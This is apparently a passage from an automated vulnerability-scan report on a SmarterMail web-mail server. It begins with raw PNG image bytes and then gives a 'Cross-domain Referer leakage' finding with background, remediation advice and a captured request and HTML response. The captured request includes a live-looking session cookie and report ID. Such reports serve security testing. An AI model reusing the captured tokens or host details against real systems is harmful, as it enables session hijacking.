@.(...@.(....g.....&`..H...K+.^...&......N<W.......i8pO.o6...}h...........=..._]r....D...........P 0......<..........l...O...s..x...^..k..>l.......[....Fv..........}8]{.........

@.(...O.Z.}...;....)9Z.~...dL.S9rtZU...U[.......gj.......d.^.}.A)l...K.XL....{..j`.n.^.=].}^u..%.&...."(........(.y...4.S%...\{....p7.}...c..U.y<....[.........=..?{?...\...    .>.p..kO.r0!...wj.....^\O...........!./..P.
@.(.}
.X...9}..)..}n.?.....O..Z6....h^.....8Nt.r....yr&K.u.
.}h...}......0.3..0a......P 8..ku....~`...4.f..........Z....m.......,fUO.X...SX.~SX...g'~z.i...}Q...>...5._..X.<....S........<o...m......S.
..s....e..u.e'....x<.w..I.j(.......Q....C.Sy|......l........r..z...z8.u..F...|....SZ.J.W.z....{..P..*...X........U....S..,.........e.el....P.
@.....f...=.X+..*...'.y.\.,...R...c8..q......./..7V..}.G...W?-'..s...G....{.F.T.{3.7.o..
........x5...P.
@.(T.=}]......W...o.~:....\.x...l...m.>....9CG..N.WR.
..k_...i...1....PO.S.{z.5.f.......QxX.&A.(......^.u.CRgt..Y.=-LE...4......s..,K`..7s....'..>h*.|.H.+..{..p....1.......Z..*..................A..P.
@.(...P....Z....?.....0....\}...S............Es...V.u*>-....=..U.~.V...I..i.zy....v..5s.U...=\.P.}8.^...../g...xN..9Q............R.7.]...&G    .gv...>v7.y.)>.~VE...y../B....p..y{....4.3..b..{U..)9.p..DK.S..C.S....DK.Q4!.Y{..N8.^v.    ..hz.......:..}.....P.
D..../_..x!...2iz.cO%_...8...(..W.....d...sO...eo."..._..U....
...{L.)e.)9{.u........8...h.Dr.f..k/...W.?.....E...........P .
.|.@'........{=.......A..~...x..{U..k...q.k.4.2.O...R~.....*.j....J.'\`.........~.${...!.<~.......P.
D.....v.K....R.>N.^.....2r.    .U.>....H.j...=\{3.^.~..Ugxs.o..@....P.
@.(.j.........8....}....6..../$,....x.*....k...G...9.#_..g...=[@..P.?.~P.
@.(...R.r..}j...k......1x..|.H.....;...w..n..p..
...U.....j.....A?.p......Qy..FA.(.........j.O..h.f.6.....w......TM.pK.^.{7p..D....rB..=.`OY|d.......+.~..
...w.}..?.xO(......n..|o..=.%.......M...dZ.u,....Si,cO.)'.G..9...h.W..o....*..I....??.:(..............Y;.:..bV..:.q1+.{.......i..{...M....4.'.    9......7Sr"5.......{..b.....p.;..P.
@.(...Z..E..u}t..kO.~\9.............S;mO..?..Y{e..k.{......._u....}..z.qP.
@.(.N.x..M...Q.pb9..].Kas^..l.'.....\{7...X.j..B+*.W.5d....3+'_u.*...F.^@.|.y.d............P.
@.(..
$.Z....X.?j].ql..........q92q)..y.......k_..V..==...
M.fpO..8~.+.F._.l ...P.
.].c......).}\|.}.4...}..S..O....b..W...g.){.[...j....s.U.......A.........P .......y....Gu....<....{.b..W.{d.c7k......
.}..V...c...
@.(...@D.._..{.......po...=..f}VzV8.......l{.Y.R.9.>^\{.9..s.~{..a.9`.C.....P.
....z....8-.\}.zx.k.Tc..|.m..<?o,.w...VvpO...k.;9aW    ....Y.j<o.U.P7.....k._.=.=../OU...X8.b......P.
DL..E[.u.\|..$..o.Z=2.u0TG~...Q......2.r......N..DM8.>V\.h.{....W..7.^.}........E.`....P.
@.(.+
..>.>6....i,..#...*.On.j....cO..k_..X.^.J.[.l.O.I...].h.Y.R].*..rD.G..L..S.?z..?~.6V...N(........U.\|..#....=..4.3i...P..*...T.>.s.....i9*.=..... ._Z.}...l....../............P V......+..)._....^..?....>5...SR.....=...M.....=3.R%...i.._...s/\{q.w..b.....X9.b;.....P.
........7...c..S.d..U2KZ..i..n...p..>.p_.q.x....~6...?.....?..P(......%.h..K..6.........{..A.g.X.j+.W.{..a.{..as...crN,.e..B.(...@.+.q.;.{.I....PEr0..n.f]<...wyl*K..r.....*....#....;.crN.....@.(...@.).q.........`..L.Q.f#0.pO....E.R....T.{..a.{..a.{..............Q......./..1x:...H.A.....=\.0.=\...}._.v...GD...........P ..0w.........N_s>qo.w,.*....#.............h.W,.G..P.
@.(...N.m;........,~..~<k..Wo.j.{...>.>...j....../..P..:.'.....2..T.{..a.{........l..s...`...P.
@.(.+
......s......4e...a....n.je.O].^..]%.+....#....8..{?....X......P.
@..V...on..i...s....y.,5...y3-..jC......~...D5\....g.'.>.S..m...F..k.q.'........|..nQ}...A.(..........OL]....$....G..i,f.....XL..W........\.v..}.`[..'.E.t9.....G..k.q...=.=-j....R....&..
@.(...@.+....^............1wO.GL^R.........==.5.7t..k.q.......Te....mQ...B.(......%.6n....C.k}!?..{...}1.s...i...p.
..<...,    .}..^v...g.....~..K.Kl+...P.
@..P..:........e)............ct....\....Vp.
.p.KY"..)
.A}=.}..26U..}V.Tk:.J...yk?.nS3.W0.....z...N.F..n..*>..FDsb...6.
@.(..bQ........%Jp.`.`..:.Y4..3.l......=\{.`_Op.
...P.=..*.....\{o4...s..._....Kl3...P.
@..Q {.....&.l.i.}x....)..bN2..    .>..r..>yo..-...z...Z.p.
..<.........7s..}s.bm..]..B.(...@.+@_..J./n.....|.} c0}.|......M.Wz.....}@..C#-&....U....."...........?db......P.
...G.V...a..|..p.
..6(.e...T...
.......k..Y{....y......$6...J(.......q......>:...X.6..i..=EsFNYV...D.p.U...=..*..h.....q.$.\Q.@..qr..n@.(.............{.]o..i0..L.I.+..O.!...=t&....
...
.p.......#kot...;..._...#!..
@.(...@.)P...&...v.....~.3.....s...$.W}.}...7.).#.Y.Cu.....5..Ux.....-.XLU..k..>.p..&Z.    9F.O........O~.w.8;Tbw.....P.
.....z........]|.=9....{..A/d...e...{..U}5Zd..2k/ ..>.O..X^..hN....B.(...@.*.g._...Y.j...s..i.b:z,.....il..O*&..qt......7....j.....p}..*.[P.
@.(..bK..{..q..ig.c9.{;.'.bL^m....'.^..........z.^.}...?...?.....[.......P ...[.j...S~.B.B.......w..P.......CRY..GJ'.E..._...y.p....ko..?P.f.E.z..[.J~L@...h.....q...8?Lb......P.
.....M..|z.~...i....9.f......6X.W..    ..3...c5Z.p.
...Vz.G\.s._^r.5,h.[.{l-...P.
4 .<.3s_..H.....u.i.......Y...}3.p.;s...4..........;.=.......8U..o....j2..S|B.d.hb.oyF^....;U..pD...m*yo.u..._F...._..w%'.u...0.]..P.
@.(.{
|...?.yqN..8L.}
#..JY..i.^#...=\...=\........Ta...;.c......P..*.d..m.........up?.d,.*.......k.-Y{9...y..oV.8...#..P.
@.(..bN...'....u..oT.p_..].X...>+..kU...=\....m..8.q..5.R3m..h...2...6....`(.........8.7zeJ......lR.......3.".......}....
.p.C..... .3..F..q.W).y..9....o...+..S..M..........P N..Ek.|)...{.w.ko..}..R=2.u0TG~...Q..].7.R.m8.j....c1s>...^.....M.t..DK..U#m.`....'.W....}=..h....:v.
@.(....)P...&...q.....    ..em.N.{.V..C......sO..R..==O..w..t..2..g.^n..[..&82B.(.......1.@..#.}x.......lt....kO.~.;.b,.\>..5.....,kU.k._s.}.>.8N......h...#96.
@.(.....@.>....w.Pj..60.'...p.~uZ...H.|....*...........k.....}.....s.R-.&@.(...........X..?......8}....<....~....g}v..2....|.......k?..=M.Y..j....=..P.
@...@.>.....P,..!....

.<:E..5..:......XL..X.>\{...j..#0m'.H......<.k.R..K....T..Rm..C....P.
@..Q.;...s.......J(...O..t.C..4E.|ZN8'.xc9.Me.y.H\Z3...K.p..>p.^...@+...H..D.p#m0q.(.......GN.....y0~.l..(.......T.v}'>.W........$............{...~.U99.F...k/.........h.}............j..A.6...P.
@..Q.]..............^......Fe....^'?.....I.......p......{......h..._..p.t...P.
@.(..bF..}&.C.......?<1".D..8..G..`..JN..=\........l.}...p.U.|x....P.
@.8W`..=w.y!.2.W.5f....2....=\{..q......@....P.
DZ...Lhc...zOj..m...k.o........n.......Sl..xSnG.2o..&.H6.
.r.....Kk...k..^s.C.H.-.r..    ............<...m...98...gz....M.m1....ib;.2..b...6....n]....m....i.L.....5|"N...e......%..m...3~....>x...q...b...-.cBN.S.|....9N#/..e....~..O;..g.P...~P.
@.(.a.....s...q3......V'......vr.a.I..7za.C.,...o'.....F0@..7.tb....@...b..s.vk'K.I.v.o............c..'.d...i.JkC...S.T._u.%=/../.B.^.}..U?..:.'....'...P.
DX......}.C.9......=.....X .'\b..{.c....=.g...o......>......T..:a.'#....s...........o.......F...|......i..6m..^....N|..I.........c2..s...kJN..<..9.a...-`%.8..#O.f...TL.h......a..p.r$.s.....1........o#<jP*9.".!...V...4IDKd7^.i.([Dt.N.&..X...u....v......~?=O~..U...Nd,\m..E..._...N.........|.........i....1.J........    .^..h'......W.2.C^...}.>.pO...p..){N........e$'.8..>TG9.....P
.0.|o...v...u.uw_...>..................k..9a.,....'.;..Xl...O.F....A..X....|.n.K....{..".].W#...>
...4..E......aX....t..s*;...Yc.m ...../f...e.v.=..mk7\.X...=z......J..g...f.y.Dq..m..d..p.z........1.@..o.......>1.9.#g.-.|YZr.=....~...... }........~....Z..^..h.|y_I7:a.h......._.].....Qs.w~4I.|s...I9r4....l..O+&.......U.......h1..$3k..........P.
D.....O..`..[...{..p.............,u..;.F..@s..o!.o...0..uD.0.'\...........&..!L...i....-x....    ...4.s&..i...`O.}..=\{>.2../.m5Z3..;Ru..Q............r#.7K..'.....fT.k.b1R.(.....9....h...Z..&.olP..{..kh..2.~c$......d+.y'...=>c2..|.&[.1...VM......d..~.o(t.^:.........{0...>>....R. ...{.....`9.U6...W..X.{..:....U2..9...Pe.    ..y.|y...3.l....C.(...@.V@eL..<tB.V6....^...v;.}~0...g......!......v. ?......U..~..bJ..
.p....../.1.r:....-X...}..J...........r\.s.....P.
@.(.J...WM.^..}..zY..,.4....l....@........=...d...].^<.y...,9..._...T<.
@.(.......n......5    .?>.gs..aZ..)...:..~..y.9.u.M..Oc.+v.J..b.......+.i.......Q....T........W....:.N.....s.....P.
@.(....:....y.c.f_.........z.b....kO.I....v]M..}..`L..N8|....+......6D./....k.6.3.`O....7?.Y..`...P..
@.(........*P...&O..)...w..G....Le.o}VF....6.=..k.},...f.o*w..W.@.O.uP.
@.(......Z....at..=..ZC~.c9....PX..YY.
...G.^..U#9.p.E3....yg..)..P.
@.(......V..    O..vL.'.~.s....=......d.*-V..j.1..S$'.7....a..i.=...P.
@.(...@H......ou.2<...f5.....{?>{Su...ZS.^...\{..#ko.....K....4.^n....i7.}?...!=........P.
@.P*.kW.m#'-z....!..C`O.............k.C.}.w......7.^....x/(.......P.
.\.Z.k.....O...\...`..L.......*.@...p.].=&.....r.3.....x.......B.(.......P \
........z!.\..i/....{s..:*........=\{W`..'...}8.8u5Z...)9.G..iK.................P.
.].7.;x..c.~.m w.    ...{.X..uc1....{U..j..]...*-....;...7.|...v..P.
@.(...@.. .r.........3...r(.3rZQ....j'..w..p...8.X....\../*.k......
@.(..........Y.......?......}s.'....l....r..C...    94-....Ev...i..r.p.....J.......G......P.
@.(..".........>7.b.....y{.X.e.t.8oku.ge.p..O.|.n.........D~..J....&_.J....^~......DK.a5..Y.Vv....>......-|....P.
@.(...U.....gdB...?>.tZ..>.....Y....p...m..FKpop.1..^.2.p(.......P .
.8....#...s..h.q...T4...o'..k.    9..W.4...%/Jew...s?.bkJ./.k..C    >.
@.(......6..........>O.. _..S.....(.    )..!.Cq.P.q(.C.*.    9j`...V...k_...g...q.?im.m...=P.
@.(................+.J......:.e.<TJ.x+..k.....I..U..H.............>C/.(.=G....Qu..y.pOq.Z.v.......M.....B.(.......P ...x.....q3W]H._V....E.-\{...D@....*....U...8.><...<..jZ...r.......P.
@.(...].......~x................s...>...W........S..xi..g..@.(.......P .......?.......}....4
S}.%\.rf5..u..........;.......~/..Q....Ny...b.....
@.(.......Q.....\....C'+..D.7`O..P.}...G.>..r2..bU....h...C$..q........$..(.......P.
.....oZWrv\...s..w.h......o.Y{j....q.U.0.;..[.I......?|)..?a......P.
@.(.5
p..mq..T.}r.'7..h...w.H...}....G.....:]e2...>....?:5e.;7G..l....P.
@.(..bU./......;.......kO..Ug.[....G..z.&9...k.._V....d....$.<~a..?.vC.(.......P .....u........{.G.>../i.}8._......E_...Z.C...W......@T.k.....P.
@.(...E*(...ye..}...=.O9z....h.../\.
.Vs.i.}.....cg>..Y....?..n.U....P.
@.(.......l.N.0b..o?..WP%p..|......N..S?.-.~....k....:....p.J5.^P.
@.(.....0Q.......b.W.Wg...H................q...Wi.q(....s.-....0.p.........xO(.......P.
.
....y....s>?U2Cw.C.t..Z.M.....\{9..f..a*.q...
@.(.......P ....w...s..}zs....4Y.&..U..2f[....R..x...i.%7^..q.ia.yG...    .W.7.6..u...x....>lc.....s.^...h..`{.....P.
@.I...o.Y.E...1.@E-.......p...^...y.HK.....'..x./L.O.~......D..?|...?......8 ........G(.K.J.M......nA.??.n?>:M...]..v.L."..}.....>..$.}.?..~..j?..................A.(.......!P...U....?.)=.:.......d....S..k....o...[......K.l.#8..W...!$oA.G@).-.....k...\c.'..s.T..M.g.|...C>1...Er{. >].m...n.TX.{...v.#}."...tr......#.W.Y.n#........P.
.I...^....-....|...}..h........kON=A......Sp6.xK....(L.
A.-....fo.9....    ........(.'.b....mx.$....(h.....7......G...C<.y...O...........\.......k=z...^._./...\.l.^....V_`.N..o4....&.    .....{..P.
@.(...O..........q..}.#.P.E.....W..XY.6..........?..q...hQ.h..8.V..{......E.O8..q..Fg.`..>?H.8..6.c......h...x..l.]....rz_...h...:t...'."^/>...Z....~#..._.B:....|.W.x.v.".Dyu.._......
.^..:)..>...k<.......P .....9....8....k.}q...?..<F.W.{L....3.7.."T.|u..?,~..u.    8\..c...    .}.^...........n...h=.r...p...%...|........ k...[....9.......mr.|..x....^2...~xr... ..5......R;1..6;IQ..<.
@.(......"..6i..?.....|...2...Z*........A6..7....J(zCM._.._.C..l}..8Et.....",z.EDJ..3.......................7.N.....O..........xM .O.l.+..au...b{5mEl...AUS<.
@.(......B.L.......+j)f......U...........,..o.lKo.u.......K.MO9..#..............$:Q...X.....iN.E....V..9.!C..|q.q{|"3..Y...(.._o.5...^..    ...S..k.g....h..|-o.O^\....+..Dn.....c..V.[...{.k..}O..Y.G.w....P.
@.(..b@..~^.sh.u...l*.!.\..G.=:.PEm:....I=....5....[.}.!._Y..~q.v.W..][..5[+.......O..(..D.1.F....V.E......-..3n..........L.........`.y.{O.y....3.&[..A.    ...Vnr.6..4.......k..Q.+.k...E......~K...=^m..3..........P.
@..Q...[.s....E....!.....[!.].....'...OVryf..l~"./:qf.....(j#.|.e.C.....i.<...@.e...6Z=G..*.0..\o.5.Vd.~.......*....*...@.(.......q........x.|{...6............s..j........2...(.3.C6Ed.b9n"9.~.8,.V...W.._..,..OE./ ~{..a|.~./.u}4...._....P...[....;.......P.
4....Oq.}<..    .w.:..N.Dm..'........rS.............&};.>Z.0~."...r....`\...=>.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(..
.....2.c.Z....IEND.B`.

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 16:00:20 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 16:00:20 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Length: 0
Connection: Close


5. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. http://vulnerable.smartermail.site:9998/Reports/frmReport.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smartermail.site:9998
Path:   /Reports/frmReport.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports HTTP/1.1
Host: vulnerable.smartermail.site:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.smartermail.site:9998/Default.aspx?section=UserStorage
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=; settings=empty; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1757530132","TopBarSection":"UserReports"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 01:58:51 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 27984



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
   <form method="post" action="frmReport.aspx?level=user&amp;reportid=3C423C57823C4B519A0426B8EF6C15D5&amp;MyReports" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEwNzI3NzE0MjgPFgYeCF9fX1RpdGxlBQtWaWV3IFJlcG9ydB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWDAIDD2QWAgIBD2QWCgIBDw8WAh4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFVmphdmFzY3JpcHQ6RW1haWxSZXBvcnRQb3B1cCgnM0M0MjNDNTc4MjNDNEI1MTlBMDQyNkI4RUY2QzE1RDUnLCAncmVwb3J0aXRlbScsICcnLCAnJyk7ZGQCAw8PFgIfAwVXamF2YXNjcmlwdDpFeHBvcnRSZXBvcnRQb3B1cCgnM0M0MjNDNTc4MjNDNEI1MTlBMDQyNkI4RUY2QzE1RDUnLCAncmVwb3J0aXRlbScsICcnLCAnJyk7ZGQCBQ8PFgIfAwU/amF2YXNjcmlwdDpBZGRGYXZvcml0ZVBvcHVwKCczQzQyM0M1NzgyM0M0QjUxOUEwNDI2QjhFRjZDMTVENScpZGQCBw8PFgIfAwVPamF2YXNjcmlwdDpEZWxldGVSZXBvcnRQb3B1cCgnM0M0MjNDNTc4MjNDNEI1MTlBMDQyNkI4RUY2QzE1RDUnLCAncmVwb3J0aXRlbScpO2RkAgsPDxYCHwMFSWphdmFzY3JpcHQ6UHJpbnRSZXBvcnQoJ3JlcG9ydGl0ZW0nLCAnM0M0MjNDNTc4MjNDNEI1MTlBMDQyNkI4RUY2QzE1RDUnKTtkZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBWhkAgcPZBYCZg9kFgICAQ8WAh8FaBYCAgEPFgIeBFRleHRlZAIIDxYCHwVoZAIJD2QWAgIBD2QWAmYPZBYCZg9kFgJmD2QWBGYPZBYCZg8PFhAeDFNlbGVjdGVkRGF0ZQYAAJrlJCvNSB4HTWluRGF0ZQYAQMr4o+jgBx4HTWF4RGF0ZQYAAGjBKVyhCR4cRW5hYmxlRW1iZWRkZWRCYXNlU3R5bGVzaGVldGgeE0VuYWJsZUVtYmVkZGVkU2tpbnNoHgRTa2luBQxTbWFydGVyVG9vbHMeCENzc0NsYXNzBRJEYXRlUGlja2VyT3ZlcnJpZGUeBF8hU0ICAmQWBmYPPCsACAEADxYQHwYFEzIwMTAtMDktMjYtMDAtMDAtMDAeBkhlaWdodBweBVdpZHRoHB8IBgBAyvij6OAHHwkGAABowSlcoQkfCmgfC2gfDgKAA2RkAgEPDxYEHghJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYeDUhvdmVySW1hZ2VVcmwFMi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L0NhbGVuZGFyTW9udGguZ2lmFgIeB29uY2xpY2sFVnJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfSW50ZXJuYWxSZXBvcnRJdGVtMF9TdGFydERhdGVDb250cm9sX1MnKSwnY2FsJyk7ZAICDzwrAA0BAA8WFAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFFkZhc3ROYXZpZ2F0aW9uTmV4dFRleHRlBQ9SZW5kZXJJbnZpc2libGVnBQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFBE1pbkQGAEDK+KPo4AcFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1heEQGAABowSlcoQkPFgYfDAUMU21hcnRlclRvb2xzHwtoHwpoZGQCAQ9kFgJmDw8WEB8HBgCAFOTbL81IHwgGAEDK+KPo4AcfCQYAAGjBKVyhCR8KaB8LaB8MBQxTbWFydGVyVG9vbHMfDQUSRGF0ZVBpY2tlck92ZXJyaWRlHw4CAmQWBmYPPCsACAEADxYQHwYFEzIwMTAtMTAtMDItMDAtMDAtMDAfDxwfEBwfCAYAQMr4o+jgBx8JBgAAaMEpXKEJHwpoHwtoHw4CgANkZAIBDw8WBB8RBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh8SBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZhYCHxMFVHJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfSW50ZXJuYWxSZXBvcnRJdGVtMF9FbmREYXRlQ29udHJvbF9TJyksJ2NhbCcpO2QCAg88KwANAQAPFhQFFkZhc3ROYXZpZ2F0aW9uUHJldlRleHRlBRZGYXN0TmF2aWdhdGlvbk5leHRUZXh0ZQUPUmVuZGVySW52aXNpYmxlZwUOUm93SGVhZGVySW1hZ2UFKS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQuZ2lmBRJOYXZpZ2F0aW9uTmV4dFRleHRlBQRNaW5EBgBAyvij6OAHBQNFUlNoBRJOYXZpZ2F0aW9uUHJldlRleHRlBRFWaWV3U2VsZWN0b3JJbWFnZQUqL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodDIuZ2lmBQRNYXhEBgAAaMEpXKEJDxYGHwwFDFNtYXJ0ZXJUb29scx8LaB8KaGRkZB3ReMjL93XM1ZhKjp9aC/rh86Jp" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = false;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$InternalUpdatePanel0'], ['ctl00$BPH$hmQuickDate'], [], 90);
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       View Report
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_EmailIcon" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="javascript:EmailReportPopup('3C423C57823C4B519A0426B8EF6C15D5', 'reportitem', '', '');; return false;"><span class="BBInner">Email</span></a></div>
   <div id="ctl00_BPH_ExportIcon" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="javascript:ExportReportPopup('3C423C57823C4B519A0426B8EF6C15D5', 'reportitem', '', '');; return false;"><span class="BBInner">Export</span></a></div>
   <div id="ctl00_BPH_AddFavoritesIcon" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="javascript:AddFavoritePopup('3C423C57823C4B519A0426B8EF6C15D5'); return false;"><span class="BBInner">Add Favorite</span></a></div>
   
   
<!-- HyperMenu -->
<div class='hmMenuBar'><ul class='hmMenu hmMenuBar hmList' id='ctl00_BPH_hmQuickDate' name='ctl00$BPH$hmQuickDate' style='z-index:800'>
   <li class='hmItem hmFirst hmLast' id='ctl00_BPH_hmQuickDate_hmQuickDateRoot' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Set Dates<span class='hmArrow'></span></a>
   <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
       <li class='hmItem hmFirst' id='ctl00_BPH_hmQuickDate_hmQuickDateRoot_QuickDateToday' style='z-index: 800'><a class='hmA' href='#'>Today</a></li>
       <li class='hmItem' id='ctl00_BPH_hmQuickDate_hmQuickDateRoot_QuickDateYesterday' style='z-index: 800'><a class='hmA' href='#'>Yesterday</a></li>
       <li class='hmItem' id='ctl00_BPH_hmQuickDate_hmQuickDateRoot_QuickDateLast7Days' style='z-index: 800'><a class='hmA' href='#'>Last 7 Days</a></li>
       <li class='hmItem' id='ctl00_BPH_hmQuickDate_hmQuickDateRoot_QuickDateLast30Days' style='z-index: 800'><a class='hmA' href='#'>Last 30 Days</a></li>
